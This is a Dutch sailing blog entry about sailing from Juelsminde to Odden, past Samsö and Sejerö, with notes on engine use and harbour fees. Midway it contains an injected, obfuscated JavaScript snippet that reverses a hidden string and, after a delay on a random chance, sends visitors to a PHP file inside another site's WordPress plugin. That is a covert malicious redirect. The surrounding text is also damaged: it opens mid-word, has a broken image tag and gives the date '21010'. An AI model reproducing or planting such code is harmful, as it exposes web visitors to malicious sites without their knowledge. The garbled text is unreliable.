Juelsminde – Odden

Dinsdag 22 juni 21010, Juelsminde – Odden

tor worden gestart en zo varen we de zuidpunt van Samsö voorbij.

Het gaat wel aanzienlijk harder dan 3 knopen, maar we laten de motor onder deze omstandigheden niet meer dan 1600 toeren draaien om het brandstofverbruik onder de 2 liter per uur te houden. Hoe dichter we bij Sejerö komen hoe meer de wind naar het NW draait. Als we tenslotte de noordpunt voorbijvaren lijkt ankeren achter Sejerö geen goed idee meer. We zeilen gelukkig weer en besluiten om toch maar een haven op te zoeken. Sjaellands Rev steekt ver uit in het Kattegat.


$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tos/Reis2010/DSC03349_404.jpg” alt=”In de haven van Odden” width=”404″ height=”640″> In de haven van Odden

De vorige keer dat we hier waren zijn we netjes tussen de tonnen van het Snekkelöb door gevaren, maar toen waren we onderweg naar Anholt. Sjaellands Rev heeft een aantal ‘doorwaadbare plaatsen’ en via één daarvan denk ik wel dichterbij het land te kunnen ronden.. Als de dieptemeter toch wat minder geruststellende waarden gaat aangeven, zoeken we maar wat dieper water op. De kaartplotter helpt ons daarbij en een mijltje meer is ook niet zo’n ramp.

Rond 19:00 uur maken we vast in Odden op Sjaelland. Uiteindelijk hebben we ruim 43 mijl gevaren, waarvan bijna 4 uur op de motor. Betalen van het havengeld van 150 Dkk gaat hier ook al in een automaat. Langs de binnenkant van de golfbreker liggen nog twee Nederlanders waarmee we overigens pas een paar woorden wisselen als we de volgende morgen weer wegvaren. Odden geeft ons gelegenheid om brood en yoghurt te kopen. In de Brugsen-winkel is een Internet-PC waarmee ik snel een aantal e-mails verstuur.

 

Dit artikel is gepubliceerd in categorie Franeker - Göteborg.